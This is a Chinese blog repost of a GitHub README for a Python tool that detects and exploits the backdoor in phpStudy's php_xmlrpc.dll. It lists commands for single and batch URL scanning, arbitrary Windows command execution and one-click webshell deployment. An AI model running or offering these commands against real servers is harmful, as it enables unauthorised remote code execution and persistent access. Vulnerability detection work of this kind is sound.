python phpstudy_GitHub - Writeup007/phpStudyBackDoor: phpStudy后门检测与利用工具,Python脚本,可一键 GetShell。...
phpStudyBackDoor
phpStudy后門檢測與利用工具,Python腳本,可一鍵 GetShell。
簡述
2019年9月20日,網上傳出 phpStudy 軟件存在后門,隨后作者立即發布聲明進行澄清,其真實情況是該軟件官網語2016年被非法入侵,然后軟件安裝包(php_xmlrpc.dll)被植入后門,可進行執行遠程命令執行。
此工具為 Python 3 編寫,支持單 url 檢測和批量 url 檢測,以及執行 cmd 命令、一鍵 GetShell
環境
Python 3
pip install requests
漏洞檢測利用
0.幫助
python phpStudyBackDoor.py -h
1.單 url 檢測
python phpStudyBackDoor.py -u "http://192.168.80.128"
存在漏洞與不存在漏洞
2.執行 cmd 命令
可執行 Windows 下任意 cmd 命令(前提是開啟了 system 函數,默認為開啟狀態)
python phpStudyBackDoor.py -u "http://192.168.80.128" --cmdshell
3.一鍵 GetShell
這個可是真的一鍵 Getshell 不騙人~~
python phpStudyBackDoor.py -u "http://192.168.80.128" --getshell
4.批量 url 檢測
對 url.txt 文件中的鏈接進行批量檢測
python phpStudyBackDoor.py -u "http://192.168.80.128" -f url.txt
參考引用
總結
以上是生活随笔為你收集整理的python phpstudy_GitHub - Writeup007/phpStudyBackDoor: phpStudy后门检测与利用工具,Python脚本,可一键 GetShell。...的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: lstm原理_Mamp;DL | LST
- 下一篇: qt通过蓝牙控制单片机_ST发布新款ST